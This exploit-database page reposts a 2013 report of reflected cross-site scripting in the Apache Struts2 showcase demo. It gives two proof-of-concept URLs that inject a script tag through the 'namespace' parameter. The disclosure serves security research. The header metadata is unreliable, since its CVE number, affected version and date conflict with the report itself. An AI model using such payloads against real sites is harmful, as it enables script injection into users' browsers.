Advertisement






Apache Struts2 showcase multiple XSS

CVE Category Price Severity
CVE-2017-9805 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2013-10-28
CPE
cpe:cpe:/a:apache:struts:2.5.20
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2013100185

Below is a copy:

*Abstract:*

The latest version of the current official
struts-2.3.15.3,struts2-showcase.war demo XSS still exist!

*Details:*

I found an update of the official demo of Strust2, so I did a test. It used
to be able to filter, escape input and escape output, but why didn’t it
escape this time?

*Proofs of concept:*

Two demo addresses’ namespacec parameters were not solved:

http://127.0.0.1:8080/struts2-07/config-browser/actionNames.action?namespace=
<script>alert(/xss/);</script>

http://127.0.0.1:8080/struts2-07/config-browser/showConfig.action?namespace=
<script>alert(/xss/);</script>&actionName=showcase

_______________________________________________

Form:http://en.wooyun.org/bugs/wooyun-2013-034

Author:Nebula <http://en.wooyun.org/whitehats/Nebula>


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum